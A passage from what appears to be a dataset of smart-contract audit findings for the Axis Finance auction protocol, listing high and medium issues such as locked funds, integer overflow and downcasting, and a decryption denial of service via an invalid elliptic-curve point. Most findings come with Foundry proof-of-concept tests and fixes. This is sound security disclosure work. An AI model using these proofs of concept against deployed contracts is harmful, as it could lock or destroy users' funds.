false\\n```\\nч```\\nfunction _revertIfLotConcluded(uint96 lotId_) internal view virtual {\\n- if (lotData[lotId_].conclusion < uint48(block.timestamp)) {\\n+ if (lotData[lotId_].conclusion <= uint48(block.timestamp)) {\\n revert Auction_MarketNotActive(lotId_);\\n }\\n\\n // Capacity is sold-out, or cancelled\\n if (lotData[lotId_].capacity == 0) revert Auction_MarketNotActive(lotId_);\\n}\\n```\\nчUsers' funds can be locked.ч```\\nfunction cancelAuction(uint96 lotId_) external override onlyInternal {\\n _revertIfLotConcluded(lotId_);\\n}\\n```\\n -Bidders can not claim their bids if the auction creator claims the proceeds.чhighчBefore the batch `auction` begins, the `auction` creator should `prefund` `base` tokens to the `auction` house. During the `auction`, `bidders` transfer `quote` tokens to the `auction` house. After the `auction` settles,\\n`Bidders` can claim their `bids` and either to receive `base` tokens or `retrieve` their `quote` tokens.\\nThe `auction creator` can receive the `quote` tokens and `retrieve` the remaining `base` tokens.\\nThere is no specific order for these two operations.\\nHowever, if the `auction creator` claims the `proceeds`, `bidders` can not claim their `bids` anymore. 
Consequently, their `funds` will remain locked in the `auction house`.\\nWhen the `auction creator` claims `Proceeds`, the `auction status` changes to `Claimed`.\\n```\\nfunction _claimProceeds(uint96 lotId_)\\n internal\\n override\\n returns (uint96 purchased, uint96 sold, uint96 payoutSent)\\n{\\n auctionData[lotId_].status = Auction.Status.Claimed;\\n}\\n```\\n\\nOnce the `auction status` has transitioned to `Claimed`, there is indeed no way to change it back to `Settled`.\\nHowever, `bidders` can only claim their `bids` when the `auction status` is `Settled`.\\n```\\nfunction claimBids(\\n uint96 lotId_,\\n uint64[] calldata bidIds_\\n)\\n external\\n override\\n onlyInternal\\n returns (BidClaim[] memory bidClaims, bytes memory auctionOutput)\\n{\\n _revertIfLotInvalid(lotId_);\\n _revertIfLotNotSettled(lotId_); // @audit, here\\n\\n return _claimBids(lotId_, bidIds_);\\n}\\n```\\n\\nPlease add below test to the `test/modules/auctions/claimBids.t.sol`.\\n```\\nfunction test_claimProceeds_before_claimBids()\\n external\\n givenLotIsCreated\\n givenLotHasStarted\\n givenBidIsCreated(_BID_AMOUNT_UNSUCCESSFUL, _BID_AMOUNT_OUT_UNSUCCESSFUL)\\n givenBidIsCreated(_BID_PRICE_TWO_AMOUNT, _BID_PRICE_TWO_AMOUNT_OUT)\\n givenBidIsCreated(_BID_PRICE_TWO_AMOUNT, _BID_PRICE_TWO_AMOUNT_OUT)\\n givenBidIsCreated(_BID_PRICE_TWO_AMOUNT, _BID_PRICE_TWO_AMOUNT_OUT)\\n givenBidIsCreated(_BID_PRICE_TWO_AMOUNT, _BID_PRICE_TWO_AMOUNT_OUT)\\n givenBidIsCreated(_BID_PRICE_TWO_AMOUNT, _BID_PRICE_TWO_AMOUNT_OUT)\\n givenBidIsCreated(_BID_PRICE_TWO_AMOUNT, _BID_PRICE_TWO_AMOUNT_OUT)\\n givenLotHasConcluded\\n givenPrivateKeyIsSubmitted\\n givenLotIsDecrypted\\n givenLotIsSettled\\n{\\n uint64 bidId = 1;\\n\\n uint64[] memory bidIds = new uint64[](1);\\n bidIds[0] = bidId;\\n\\n // Call the function\\n vm.prank(address(_auctionHouse));\\n _module.claimProceeds(_lotId);\\n\\n\\n bytes memory err = abi.encodeWithSelector(EncryptedMarginalPriceAuctionModule.Auction_WrongState.selector, 
_lotId);\\n vm.expectRevert(err);\\n vm.prank(address(_auctionHouse));\\n _module.claimBids(_lotId, bidIds);\\n}\\n```\\nчAllow `bidders` to claim their `bids` even when the `auction status` is `Claimed`.чUsers' funds could be locked.ч```\\nfunction _claimProceeds(uint96 lotId_)\\n internal\\n override\\n returns (uint96 purchased, uint96 sold, uint96 payoutSent)\\n{\\n auctionData[lotId_].status = Auction.Status.Claimed;\\n}\\n```\\n -Bidders' funds may become locked due to inconsistent price order checks in MaxPriorityQueue and the _claimBid function.чhighчIn the `MaxPriorityQueue`, `bids` are ordered by decreasing `price`. We calculate the `marginal price`, `marginal bid ID`, and determine the `auction winners`. When a `bidder` wants to claim, we verify that the `bid price` of this `bidder` exceeds the `marginal price`. However, there's minor inconsistency: certain `bids` may have `marginal price` and a smaller `bid ID` than `marginal bid ID` and they are not actually `winners`. As a result, the `auction winners` and these `bidders` can receive `base` tokens. However, there is a finite supply of `base` tokens for `auction winners`. 
Early `bidders` who claim can receive `base` tokens, but the last `bidders` can not.\\nThe comparison for the order of `bids` in the `MaxPriorityQueue` is as follow: if `q1 * b2 < q2 * b1` then `bid (q2, b2)` takes precedence over `bid (q1, b1)`.\\n```\\nfunction _isLess(Queue storage self, uint256 i, uint256 j) private view returns (bool) {\\n uint64 iId = self.bidIdList[i];\\n uint64 jId = self.bidIdList[j];\\n Bid memory bidI = self.idToBidMap[iId];\\n Bid memory bidJ = self.idToBidMap[jId];\\n uint256 relI = uint256(bidI.amountIn) * uint256(bidJ.minAmountOut);\\n uint256 relJ = uint256(bidJ.amountIn) * uint256(bidI.minAmountOut);\\n if (relI == relJ) {\\n return iId > jId;\\n }\\n return relI < relJ;\\n}\\n```\\n\\nAnd in the `_calimBid` function, the `price` is checked directly as follow: if q * 10 ** baseDecimal / b >= marginal `price`, then this `bid` can be claimed.\\n```\\nfunction _claimBid(\\n uint96 lotId_,\\n uint64 bidId_\\n) internal returns (BidClaim memory bidClaim, bytes memory auctionOutput_) {\\n uint96 price = uint96(\\n bidData.minAmountOut == 0\\n ? 0 // TODO technically minAmountOut == 0 should be an infinite price, but need to check that later. Need to be careful we don't introduce a way to claim a bid when we set marginalPrice to type(uint96).max when it cannot be settled.\\n : Math.mulDivUp(uint256(bidData.amount), baseScale, uint256(bidData.minAmountOut))\\n );\\n uint96 marginalPrice = auctionData[lotId_].marginalPrice;\\n if (\\n price > marginalPrice\\n || (price == marginalPrice && bidId_ <= auctionData[lotId_].marginalBidId)\\n ) { }\\n}\\n```\\n\\nThe issue is that a `bid` with the `marginal price` might being placed after marginal `bid` in the `MaxPriorityQueue` due to rounding.\\n```\\nq1 * b2 < q2 * b1, but mulDivUp(q1, 10 ** baseDecimal, b1) = mulDivUp(q2, 10 ** baseDecimal, b2)\\n```\\n\\nLet me take an example. 
The `capacity` is `10e18` and there are `6 bids` ((4e18 + 1, 2e18) for first `bidder`, `(4e18 + 2, 2e18)` for the other `bidders`. The order in the `MaxPriorityQueue` is `(2, 3, 4, 5, `6`, 1)`. The `marginal bid ID` is `6`. The `marginal price` is `2e18` + 1. The `auction winners` are `(2, 3, 4, 5, 6)`. However, `bidder` 1 can also claim because it's `price` matches the `marginal price` and it has the smallest `bid ID`. There are only `10e18` `base` tokens, but all `6 bidders` require `2e18` `base` tokens. As a result, at least one `bidder` won't be able to claim `base` tokens, and his `quote` tokens will remain locked in the `auction house`.\\nThe Log is\\n```\\nmarginal price ==> 2000000000000000001\\nmarginal bid id ==> 6\\n\\npaid to bid 1 ==> 4000000000000000001\\npayout to bid 1 ==> 1999999999999999999\\n*****\\npaid to bid 2 ==> 4000000000000000002\\npayout to bid 2 ==> 2000000000000000000\\n*****\\npaid to bid 3 ==> 4000000000000000002\\npayout to bid 3 ==> 2000000000000000000\\n*****\\npaid to bid 4 ==> 4000000000000000002\\npayout to bid 4 ==> 2000000000000000000\\n*****\\npaid to bid 5 ==> 4000000000000000002\\npayout to bid 5 ==> 2000000000000000000\\n*****\\npaid to bid 6 ==> 4000000000000000002\\npayout to bid 6 ==> 2000000000000000000\\n```\\n\\nPlease add below test to the `test/modules/auctions/EMPA/claimBids.t.sol`\\n```\\nfunction test_claim_nonClaimable_bid()\\n external\\n givenLotIsCreated\\n givenLotHasStarted\\n givenBidIsCreated(4e18 + 1, 2e18) // bidId = 1\\n givenBidIsCreated(4e18 + 2, 2e18) // bidId = 2\\n givenBidIsCreated(4e18 + 2, 2e18) // bidId = 3\\n givenBidIsCreated(4e18 + 2, 2e18) // bidId = 4\\n givenBidIsCreated(4e18 + 2, 2e18) // bidId = 5\\n givenBidIsCreated(4e18 + 2, 2e18) // bidId = 6\\n givenLotHasConcluded\\n givenPrivateKeyIsSubmitted\\n givenLotIsDecrypted\\n givenLotIsSettled\\n{\\n EncryptedMarginalPriceAuctionModule.AuctionData memory auctionData = _getAuctionData(_lotId);\\n\\n console2.log('marginal price ==> ', 
auctionData.marginalPrice);\\n console2.log('marginal bid id ==> ', auctionData.marginalBidId);\\n console2.log('');\\n\\n for (uint64 i; i < 6; i ++) {\\n uint64[] memory bidIds = new uint64[](1);\\n bidIds[0] = i + 1;\\n vm.prank(address(_auctionHouse));\\n (Auction.BidClaim[] memory bidClaims,) = _module.claimBids(_lotId, bidIds);\\n Auction.BidClaim memory bidClaim = bidClaims[0];\\n if (i > 0) {\\n console2.log('*****');\\n }\\n console2.log('paid to bid ', i + 1, ' ==> ', bidClaim.paid);\\n console2.log('payout to bid ', i + 1, ' ==> ', bidClaim.payout);\\n }\\n}\\n```\\nчIn the `MaxPriorityQueue`, we should check the price: `Math.mulDivUp(q, 10 ** baseDecimal, b)`.чч```\\nfunction _isLess(Queue storage self, uint256 i, uint256 j) private view returns (bool) {\\n uint64 iId = self.bidIdList[i];\\n uint64 jId = self.bidIdList[j];\\n Bid memory bidI = self.idToBidMap[iId];\\n Bid memory bidJ = self.idToBidMap[jId];\\n uint256 relI = uint256(bidI.amountIn) * uint256(bidJ.minAmountOut);\\n uint256 relJ = uint256(bidJ.amountIn) * uint256(bidI.minAmountOut);\\n if (relI == relJ) {\\n return iId > jId;\\n }\\n return relI < relJ;\\n}\\n```\\n -Overflow in curate() function, results in permanently stuck fundsчhighчThe `Axis-Finance` protocol has a curate() function that can be used to set a certain fee to a curator set by the seller for a certain auction. Typically, a curator is providing some service to an auction seller to help the sale succeed. This could be doing diligence on the project and `vouching` for them, or something simpler, such as listing the auction on a popular interface. A lot of memecoins have a big supply in the trillions, for example SHIBA INU has a total supply of nearly 1000 trillion tokens and each token has 18 decimals. With a lot of new memecoins emerging every day due to the favorable bullish conditions and having supply in the trillions, it is safe to assume that such protocols will interact with the `Axis-Finance` protocol. 
Creating auctions for big amounts, and promising big fees to some celebrities or influencers to promote their project. The funding parameter in the Routing struct is of type `uint96`\\n```\\n struct Routing {\\n // rest of code\\n uint96 funding; \\n // rest of code\\n }\\n```\\n\\nThe max amount of tokens with 18 decimals a `uint96` variable can hold is around 80 billion. The problem arises in the curate() function, If the auction is prefunded, which all batch auctions are( a normal FPAM auction can also be prefunded), and the amount of prefunded tokens is big enough, close to 80 billion tokens with 18 decimals, and the curator fee is for example 7.5%, when the `curatorFeePayout` is added to the current funding, the funding will overflow.\\n```\\nunchecked {\\n routing.funding += curatorFeePayout;\\n}\\n```\\n\\nGist After following the steps in the above mentioned gist, add the following test to the `AuditorTests.t.sol`\\n```\\nfunction test_CuratorFeeOverflow() public {\\n vm.startPrank(alice);\\n Veecode veecode = fixedPriceAuctionModule.VEECODE();\\n Keycode keycode = keycodeFromVeecode(veecode);\\n bytes memory _derivativeParams = \"\";\\n uint96 lotCapacity = 75_000_000_000e18; // this is 75 billion tokens\\n mockBaseToken.mint(alice, 100_000_000_000e18);\\n mockBaseToken.approve(address(auctionHouse), type(uint256).max);\\n\\n FixedPriceAuctionModule.FixedPriceParams memory myStruct = FixedPriceAuctionModule.FixedPriceParams({\\n price: uint96(1e18),\\n maxPayoutPercent: uint24(1e5)\\n });\\n\\n Auctioneer.RoutingParams memory routingA = Auctioneer.RoutingParams({\\n auctionType: keycode,\\n baseToken: mockBaseToken,\\n quoteToken: mockQuoteToken,\\n curator: curator,\\n callbacks: ICallback(address(0)),\\n callbackData: abi.encode(\"\"),\\n derivativeType: toKeycode(\"\"),\\n derivativeParams: _derivativeParams,\\n wrapDerivative: false,\\n prefunded: true\\n });\\n\\n Auction.AuctionParams memory paramsA = Auction.AuctionParams({\\n start: 0,\\n duration: 
1 days,\\n capacityInQuote: false,\\n capacity: lotCapacity,\\n implParams: abi.encode(myStruct)\\n });\\n\\n string memory infoHashA;\\n auctionHouse.auction(routingA, paramsA, infoHashA); \\n vm.stopPrank();\\n\\n vm.startPrank(owner);\\n FeeManager.FeeType type_ = FeeManager.FeeType.MaxCurator;\\n uint48 fee = 7_500; // 7.5% max curator fee\\n auctionHouse.setFee(keycode, type_, fee);\\n vm.stopPrank();\\n\\n vm.startPrank(curator);\\n uint96 fundingBeforeCuratorFee;\\n uint96 fundingAfterCuratorFee;\\n (,fundingBeforeCuratorFee,,,,,,,) = auctionHouse.lotRouting(0);\\n console2.log(\"Here is the funding normalized before curator fee is set: \", fundingBeforeCuratorFee/1e18);\\n auctionHouse.setCuratorFee(keycode, fee);\\n bytes memory callbackData_ = \"\";\\n auctionHouse.curate(0, callbackData_);\\n (,fundingAfterCuratorFee,,,,,,,) = auctionHouse.lotRouting(0);\\n console2.log(\"Here is the funding normalized after curator fee is set: \", fundingAfterCuratorFee/1e18);\\n console2.log(\"Balance of base token of the auction house: \", mockBaseToken.balanceOf(address(auctionHouse))/1e18);\\n vm.stopPrank();\\n }\\n```\\n\\n```\\nLogs:\\n Here is the funding normalized before curator fee is set: 75000000000\\n Here is the funding normalized after curator fee is set: 1396837485\\n Balance of base token of the auction house: 80625000000\\n```\\n\\nTo run the test use: `forge test -vvv --mt test_CuratorFeeOverflow`чEither remove the unchecked block\\n```\\nunchecked {\\n routing.funding += curatorFeePayout;\\n}\\n```\\n\\nso that when overflow occurs, the transaction will revert, or better yet also change the funding variable type from `uint96` to `uint256` this way sellers can create big enough auctions, and provide sufficient curator fee in order to bootstrap their protocol successfully .чIf there is an overflow occurs in the curate() function, a big portion of the tokens will be stuck in the `Axis-Finance` protocol forever, as there is no way for them to be 
withdrawn, either by an admin function, or by canceling the auction (if an auction has started, only FPAM auctions can be canceled), as the amount returned is calculated in the following way\\n```\\n if (routing.funding > 0) {\\n uint96 funding = routing.funding;\\n\\n // Set to 0 before transfer to avoid re-entrancy\\n routing.funding = 0;\\n\\n // Transfer the base tokens to the appropriate contract\\n Transfer.transfer(\\n routing.baseToken,\\n _getAddressGivenCallbackBaseTokenFlag(routing.callbacks, routing.seller),\\n funding,\\n false\\n );\\n // rest of code\\n }\\n```\\nч```\\n struct Routing {\\n // rest of code\\n uint96 funding; \\n // rest of code\\n }\\n```\\n -It is possible to DoS batch auctions by submitting invalid AltBn128 points when biddingчhighчBidders can submit invalid points for the AltBn128 elliptic curve. The invalid points will make the decrypting process always revert, effectively DoSing the auction process, and locking funds forever in the protocol.\\nAxis finance supports a sealed-auction type of auctions, which is achieved in the Encrypted Marginal Price Auction module by leveraging the ECIES encryption scheme. Axis will specifically use a simplified ECIES implementation that uses the AltBn128 curve, which is a curve with generator point (1,2) and the following formula:\\n$$ y^2 = x^3 + 3 $$\\nBidders will submit encrypted bids to the protocol. 
One of the parameters required to be submitted by the bidders so that bids can later be decrypted is a public key that will be used in the EMPA decryption process:\\n```\\n// EMPAM.sol\\n\\nfunction _bid(\\n uint96 lotId_, \\n address bidder_,\\n address referrer_,\\n uint96 amount_,\\n bytes calldata auctionData_\\n ) internal override returns (uint64 bidId) {\\n // Decode auction data \\n (uint256 encryptedAmountOut, Point memory bidPubKey) = \\n abi.decode(auctionData_, (uint256, Point));\\n \\n // rest of code\\n\\n // Check that the bid public key is a valid point for the encryption library\\n if (!ECIES.isValid(bidPubKey)) revert Auction_InvalidKey(); \\n \\n // rest of code\\n\\n return bidId;\\n }\\n```\\n\\nAs shown in the code snippet, bidders will submit a `bidPubKey`, which consists in an x and y coordinate (this is actually the public key, which can be represented as a point with x and y coordinates over an elliptic curve).\\nThe `bidPubKey` point will then be validated by the ECIES library's `isValid()` function. Essentially, this function will perform three checks:\\nVerify that the point provided is on the AltBn128 curve\\nEnsure the x and y coordinates of the point provided don't correspond to the generator point (1, 2)\\nEnsure that the x and y coordinates of the point provided don't corrspond to the point at infinity (0,0)\\n```\\n// ECIES.sol\\n\\nfunction isOnBn128(Point memory p) public pure returns (bool) {\\n // check if the provided point is on the bn128 curve y**2 = x**3 + 3, which has generator point (1, 2)\\n return _fieldmul(p.y, p.y) == _fieldadd(_fieldmul(p.x, _fieldmul(p.x, p.x)), 3);\\n }\\n \\n /// @notice Checks whether a point is valid. 
We consider a point valid if it is on the curve and not the generator point or the point at infinity.\\n function isValid(Point memory p) public pure returns (bool) { \\n return isOnBn128(p) && !(p.x == 1 && p.y == 2) && !(p.x == 0 && p.y == 0); \\n }\\n```\\n\\nAlthough these checks are correct, one important check is missing in order to consider that the point is actually a valid point in the AltBn128 curve.\\nAs a summary, ECC incorporates the concept of finite fields. Essentially, the elliptic curve is considered as a square matrix of size pxp, where p is the finite field (in our case, the finite field defined in Axis' `ECIES.sol` library is stord in the `FIELD_MODULUS` constant with a value of 21888242871839275222246405745257275088696311157297823662689037894645226208583). The curve equation then takes this form:\\n$$ y2 = x^3 + ax + b (mod p) $$\\nNote that because the function is now limited to a field of pxp, any point provided that has an x or y coordinate greater than the modulus will fall outside of the matrix, thus being invalid. In other words, if x > p or y > p, the point should be considered invalid. However, as shown in the previous snippet of code, this check is not performed in Axis' ECIES implementation.\\nThis enables a malicious bidder to provide an invalid point with an x or y coordinate greater than the field, but that still passes the checked conditions in the ECIES library. The `isValid()` check will pass and the bid will be successfully submitted, although the public key is theoretically invalid.\\nThis leads us to the second part of the attack. When the auction concludes, the decryption process will begin. The process consists in:\\nCalling the `decryptAndSortBids()` function. This will trigger the internal `_decryptAndSortBids()` function. It is important to note that this function will only set the status of the auction to `Decrypted` if ALL the bids submitted have been decrypted. 
Otherwise, the auction can't continue.\\n`_decryptAndSortBids()` will call the internal `_decrypt()` function for each of the bids submittted\\n`_decrypt()` will finally call the ECIES' `decrypt()` function so that the bid can be decrypted:\\n// EMPAM.sol\\n\\nfunction _decrypt(\\n uint96 lotId_,\\n uint64 bidId_,\\n uint256 `privateKey_`\\n ) internal view returns (uint256 amountOut) {\\n // Load the encrypted bid data\\n EncryptedBid memory encryptedBid = encryptedBids[lotId_][bidId_];\\n\\n // Decrypt the message\\n // We expect a salt calculated as the keccak256 hash of lot id, bidder, and amount to provide some (not total) uniqueness to the encryption, even if the same shared secret is used\\n Bid storage bidData = bids[lotId_][bidId_];\\n uint256 message = ECIES.decrypt(\\n encryptedBid.encryptedAmountOut,\\n `encryptedBid.bidPubKey`, \\n `privateKey_`, \\n uint256(keccak256(abi.encodePacked(lotId_, bidData.bidder, bidData.amount))) // @audit-issue [MEDIUM] - Missing bidId in salt creates the edge case where a bid susceptible of being discovered if a user places two bids with the same input amount. Because the same key will be used when performing the XOR, the symmetric key can be extracted, thus potentially revealing the bid amounts.\\n ); \\n \\n \\n ...\\n } \\nAs shown in the code snippet, one of the parameters passed to the `ECIES.decrypt()` function will be the `encryptedBid.bidPubKey` (the invalid point provided by the malicious bidder). 
As we can see, the first step performed by `ECIES.decrypt()` will be to call the `recoverSharedSecret()` function, passing the invalid public key (ciphertextPubKey_) and the auction's global `privateKey_` as parameter:\\n// ECIES.sol\\n\\nfunction decrypt(\\n uint256 ciphertext_,\\n Point memory `ciphertextPubKey_`,\\n uint256 `privateKey_`,\\n uint256 salt_\\n ) public view returns (uint256 message_) {\\n // Calculate the shared secret\\n // Validates the ciphertext public key is on the curve and the private key is valid\\n uint256 sharedSecret = recoverSharedSecret(ciphertextPubKey_, privateKey_);\\n\\n ...\\n }\\n \\n function recoverSharedSecret(\\n Point memory `ciphertextPubKey_`,\\n uint256 `privateKey_`\\n ) public view returns (uint256) {\\n ...\\n \\n Point memory p = _ecMul(ciphertextPubKey_, privateKey_);\\n\\n return p.x;\\n }\\n \\n function _ecMul(Point memory p, uint256 scalar) private view returns (Point memory p2) {\\n (bool success, bytes memory output) =\\n address(0x07).staticcall{gas: 6000}(abi.encode(p.x, p.y, scalar));\\n\\n if (!success || output.length == 0) revert(\"ecMul failed.\");\\n\\n p2 = abi.decode(output, (Point));\\n }\\nAmong other things, `recoverSharedSecret()` will execute a scalar multiplication between the invalid public key and the global private key via the `ecMul` precompile. This is where the denial of service will take place.\\nThe ecMul precompile contract was incorporated in EIP-196. Checking the EIP's exact semantics section, we can see that inputs will be considered invalid if “… any of the field elements (point coordinates) is equal or larger than the field modulus p, the contract fails”. 
Because the point submitted by the bidder had one of the x or y coordinates bigger than the field modulus p (because Axis never validated that such value was smaller than the field), the call to the ecmul precompile will fail, reverting with the “ecMul failed.” error.\\nBecause the decryption process expects ALL the bids submitted for an auction to be decrypted prior to actually setting the auctions state to `Decrypted`, if only one bid decryption fails, the decryption process won't be completed, and the whole auction process (decrypting, settling, …) won't be executable because the auction never reaches the `Decrypted` state.\\nProof of Concept\\nThe following proof of concept shows a reproduction of the attack mentioned above. In order to reproduce it, following these steps:\\nInside `EMPAModuleTest.sol`, change the `_createBidData()` function so that it uses the (21888242871839275222246405745257275088696311157297823662689037894645226208584, 2) point instead of the `_bidPublicKey` variable. 
This is a valid point as per Axis' checks, but it is actually invalid given that the x coordinate is greater than the field modulus:\\n`// EMPAModuleTest.t.sol\\n\\nfunction _createBidData(\\n address bidder_,\\n uint96 amountIn_,\\n uint96 amountOut_\\n ) internal view returns (bytes memory) {\\n uint256 encryptedAmountOut = _encryptBid(_lotId, bidder_, amountIn_, amountOut_);\\n \\n- return abi.encode(encryptedAmountOut, _bidPublicKey);\\n+ return abi.encode(encryptedAmountOut, Point({x: 21888242871839275222246405745257275088696311157297823662689037894645226208584, y: 2}));\\n } `\\nPaste the following code in moonraker/test/modules/auctions/EMPA/decryptAndSortBids.t.sol:\\n`// decryptAndSortBids.t.sol\\n\\nfunction testBugdosDecryption()\\n external\\n givenLotIsCreated\\n givenLotHasStarted\\n givenBidIsCreated(_BID_AMOUNT, _BID_AMOUNT_OUT) \\n givenBidIsCreated(_BID_AMOUNT, _BID_AMOUNT_OUT) \\n givenLotHasConcluded \\n givenPrivateKeyIsSubmitted\\n {\\n\\n vm.expectRevert(\"ecMul failed.\");\\n _module.decryptAndSortBids(_lotId, 1);\\n\\n }`\\nRun the test inside `moonraker` with the following command: `forge test --mt testBugdosDecryption`чEnsure that the x and y coordinates are smaller than the field modulus inside the `ECIES.sol` `isValid()` function, adding the `p.x < FIELD_MODULUS && p.y < FIELD_MODULUS` check so that invalid points can't be submitted:\\n```\\n// ECIES.sol\\n\\nfunction isValid(Point memory p) public pure returns (bool) { \\n// Remove the line below\\n return isOnBn128(p) && !(p.x == 1 && p.y == 2) && !(p.x == 0 && p.y == 0); \\n// Add the line below\\n return isOnBn128(p) && !(p.x == 1 && p.y == 2) && !(p.x == 0 && p.y == 0) && (p.x < FIELD_MODULUS && p.y < FIELD_MODULUS); \\n }\\n```\\nчHigh. A malicious bidder can effectively DoS the decryption process, which will prevent all actions in the protocol from being executed. 
This attack will make all the bids and prefunded auction funds remain stuck forever in the contract, because all the functions related to the post-concluded auction steps expect the bids to be first decrypted.ч```\\n// EMPAM.sol\\n\\nfunction _bid(\\n uint96 lotId_, \\n address bidder_,\\n address referrer_,\\n uint96 amount_,\\n bytes calldata auctionData_\\n ) internal override returns (uint64 bidId) {\\n // Decode auction data \\n (uint256 encryptedAmountOut, Point memory bidPubKey) = \\n abi.decode(auctionData_, (uint256, Point));\\n \\n // rest of code\\n\\n // Check that the bid public key is a valid point for the encryption library\\n if (!ECIES.isValid(bidPubKey)) revert Auction_InvalidKey(); \\n \\n // rest of code\\n\\n return bidId;\\n }\\n```\\n -Downcasting to uint96 can cause assets to be lost for some tokensчhighчDowncasting to uint96 can cause assets to be lost for some tokens\\nAfter summing the individual bid amounts, the total bid amount is downcasted to uint96 without any checks\\n```\\n settlement_.totalIn = uint96(result.totalAmountIn);\\n```\\n\\nuint96 can be overflowed for multiple well traded tokens:\\nEg:\\nshiba inu : current price = $0.00003058 value of type(uint96).max tokens ~= 2^96 * 0.00003058 / 10^18 == 2.5 million $\\nHence auctions that receive more than type(uint96).max amount of tokens will be downcasted leading to extreme loss for the auctionerчUse a higher type or warn the user's of the limitations on the auction sizesчThe auctioner will suffer extreme loss in situations where the auctions bring in >uint96 amount of tokensч```\\n settlement_.totalIn = uint96(result.totalAmountIn);\\n```\\n -Incorrect `prefundingRefund` calculation will disallow claimingчhighчIncorrect `prefundingRefund` calculation will lead to underflow and hence disallowing claiming\\nThe `prefundingRefund` variable calculation inside the `claimProceeds` function is incorrect\\n```\\n function claimProceeds(\\n uint96 lotId_,\\n bytes calldata 
callbackData_\\n ) external override nonReentrant {\\n \\n // rest of code\\n\\n (uint96 purchased_, uint96 sold_, uint96 payoutSent_) =\\n _getModuleForId(lotId_).claimProceeds(lotId_);\\n\\n // rest of code.\\n\\n // Refund any unused capacity and curator fees to the address dictated by the callbacks address\\n // By this stage, a partial payout (if applicable) and curator fees have been paid, leaving only the payout amount (`totalOut`) remaining.\\n uint96 prefundingRefund = routing.funding + payoutSent_ - sold_;\\n unchecked {\\n routing.funding -= prefundingRefund;\\n }\\n```\\n\\nHere `sold` is the total base quantity that has been `sold` to the bidders. Unlike required, the `routing.funding` variable need not be holding `capacity + (0,curator fees)` since it is decremented every time a payout of a bid is claimed\\n```\\n function claimBids(uint96 lotId_, uint64[] calldata bidIds_) external override nonReentrant {\\n \\n // rest of code.\\n\\n if (bidClaim.payout > 0) {\\n \\n // rest of code\\n\\n // Reduce funding by the payout amount\\n unchecked {\\n routing.funding -= bidClaim.payout;\\n }\\n```\\n\\nExample\\nCapacity = 100 prefunded, hence routing.funding == 100 initially Sold = 90 and no partial fill/curation All bidders claim before the claimProceed function is invoked Hence routing.funding = 100 - 90 == 10 When claimProceeds is invoked, underflow and revert:\\nuint96 prefundingRefund = routing.funding + payoutSent_ - sold_ == 10 + 0 - 90чChange the calculation to:\\n```\\nuint96 prefundingRefund = capacity - sold_ + curatorFeesAdjustment (how much was prefunded initially - how much will be sent out based on capacity - sold)\\n```\\nчClaim proceeds function is broken. 
Sellers won't be able to receive the proceedingsч```\\n function claimProceeds(\\n uint96 lotId_,\\n bytes calldata callbackData_\\n ) external override nonReentrant {\\n \\n // rest of code\\n\\n (uint96 purchased_, uint96 sold_, uint96 payoutSent_) =\\n _getModuleForId(lotId_).claimProceeds(lotId_);\\n\\n // rest of code.\\n\\n // Refund any unused capacity and curator fees to the address dictated by the callbacks address\\n // By this stage, a partial payout (if applicable) and curator fees have been paid, leaving only the payout amount (`totalOut`) remaining.\\n uint96 prefundingRefund = routing.funding + payoutSent_ - sold_;\\n unchecked {\\n routing.funding -= prefundingRefund;\\n }\\n```\\n -If pfBidder gets blacklisted the settlement process would be broken and every other bidders and the seller would lose their fundsчmediumчDuring batch auction settlement, the bidder whos bid was partially filled gets the refund amount in quote tokens and his payout in base immediately. In case if quote or base is a token with blacklisted functionality (e.g. 
USDC) and bidder's account gets blacklisted after the bid was submitted, the settlement would be bricked and all bidders and the seller would lose their tokens/proceeds.\\nIn the `AuctionHouse.settlement()` function there is a check if the bid was partially filled, in which case the function handles refund and payout immediately:\\n```\\n // Check if there was a partial fill and handle the payout + refund\\n if (settlement.pfBidder != address(0)) {\\n // Allocate quote and protocol fees for bid\\n _allocateQuoteFees(\\n feeData.protocolFee,\\n feeData.referrerFee,\\n settlement.pfReferrer,\\n routing.seller,\\n routing.quoteToken,\\n // Reconstruct bid amount from the settlement price and the amount out\\n uint96(\\n Math.mulDivDown(\\n settlement.pfPayout, settlement.totalIn, settlement.totalOut\\n )\\n )\\n );\\n\\n // Reduce funding by the payout amount\\n unchecked {\\n routing.funding -= uint96(settlement.pfPayout);\\n }\\n\\n // Send refund and payout to the bidder\\n //@audit if pfBidder gets blacklisted the settlement is broken\\n Transfer.transfer(\\n routing.quoteToken, settlement.pfBidder, settlement.pfRefund, false\\n );\\n\\n _sendPayout(settlement.pfBidder, settlement.pfPayout, routing, auctionOutput);\\n }\\n```\\n\\nIf `pfBidder` gets blacklisted after he submitted his bid, the call to `settle()` would revert. 
There is no way for other bidders to get a refund for the auction since settlement can only happen after auction conclusion but the `refundBid()` function needs to be called before the conclusion:\\n```\\n function settle(uint96 lotId_)\\n external\\n virtual\\n override\\n onlyInternal\\n returns (Settlement memory settlement, bytes memory auctionOutput)\\n {\\n // Standard validation\\n _revertIfLotInvalid(lotId_);\\n _revertIfBeforeLotStart(lotId_);\\n _revertIfLotActive(lotId_); //@audit\\n _revertIfLotSettled(lotId_);\\n \\n // rest of code\\n}\\n```\\n\\n```\\n function refundBid(\\n uint96 lotId_,\\n uint64 bidId_,\\n address caller_\\n ) external override onlyInternal returns (uint96 refund) {\\n // Standard validation\\n _revertIfLotInvalid(lotId_);\\n _revertIfBeforeLotStart(lotId_);\\n _revertIfBidInvalid(lotId_, bidId_);\\n _revertIfNotBidOwner(lotId_, bidId_, caller_);\\n _revertIfBidClaimed(lotId_, bidId_);\\n _revertIfLotConcluded(lotId_); //@audit\\n\\n // Call implementation-specific logic\\n return _refundBid(lotId_, bidId_, caller_);\\n }\\n```\\n\\nAlso, the `claimBids` function would also revert since the lot wasn't settled and the seller wouldn't be able to get his prefunding back since he can neither `cancel()` the lot nor `claimProceeds()`.чSeparate the payout and refunding logic for pfBidder from the settlement process.чLoss of fundsч```\\n // Check if there was a partial fill and handle the payout + refund\\n if (settlement.pfBidder != address(0)) {\\n // Allocate quote and protocol fees for bid\\n _allocateQuoteFees(\\n feeData.protocolFee,\\n feeData.referrerFee,\\n settlement.pfReferrer,\\n routing.seller,\\n routing.quoteToken,\\n // Reconstruct bid amount from the settlement price and the amount out\\n uint96(\\n Math.mulDivDown(\\n settlement.pfPayout, settlement.totalIn, settlement.totalOut\\n )\\n )\\n );\\n\\n // Reduce funding by the payout amount\\n unchecked {\\n routing.funding -= uint96(settlement.pfPayout);\\n }\\n\\n // 
